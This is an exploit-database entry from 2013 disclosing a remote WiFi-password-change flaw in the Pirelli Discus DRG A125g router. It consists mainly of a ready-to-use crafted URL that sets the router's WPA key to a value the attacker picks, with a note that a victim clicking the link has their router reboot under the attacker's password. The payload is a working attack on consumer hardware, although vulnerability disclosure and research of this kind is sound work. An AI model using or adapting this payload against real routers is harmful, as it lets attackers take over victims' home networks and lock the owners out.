Pirelli Discus DRG A125g Remote Change WiFi Password Vulnerability

2013.11.24

Credit: Sebastian Magof

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Pirelli Discus DRG A125g remote change wifi password
vulnerability
# Hardware: Pirelli Discus DRG A125g
# Date: 2013/11/23
# Exploit Author: Sebastin Magof
# Tested on: Linux/Windows
# Twitter: @smagof
# Greetz: Family, friends && under guys.
# Special Greetz:
# (\/)
# (**) &#945;lpha
#(")(")
 
 
#Exploit:
 
http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip
 
#info: where the parameter wlWpaPsk=PASSWORDHERE is where we will enter the
password we want to put the victim wifi. If the victim clicks on the url
your modem / router will reboot automatically with the new password
provided by the attacker.

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Pirelli Discus DRG A125g Remote Change WiFi Password Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Pirelli Discus DRG A125g Remote Change WiFi Password Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.